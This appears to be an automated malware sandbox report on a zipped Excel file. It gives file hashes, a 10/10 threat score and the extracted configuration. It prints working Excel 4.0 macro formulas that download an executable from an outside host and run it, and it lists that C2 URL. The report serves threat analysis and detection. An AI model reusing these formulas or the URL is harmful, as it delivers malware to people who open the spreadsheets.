General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • MD5

    8e9252a52f41b4adee25949bdba0496a

  • SHA1

    061b8bebf86e8d7aecf1b2b6c3cff2a55fc86087

  • SHA256

    11ff1df44d316934267b2f7afe24889968ba45c7b44ad6e610a5062f13705d72

  • SHA512

    d6cd316035884af99d4212d509dccf4e31233f0065d75e5123cc0345dc71b80d3c90937b51f0d97d35a6c2035c4d9219e8a36d6e13861f833fbceeb5f6eb8ed5

  • SSDEEP

    1536:7eoi+XMGiZE6AxQPnuztVvK4O9fIMS/nUeGdhDwWfYjtO2aO6vzoVG8Y:Li+dVxQPuztFKJfL6WQhO2a5ghY

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0)
    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0)
    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0)
    =HALT()

Signatures

Files

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip
    .zip

    Password: infected

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx
    .xls .xlsx windows office2003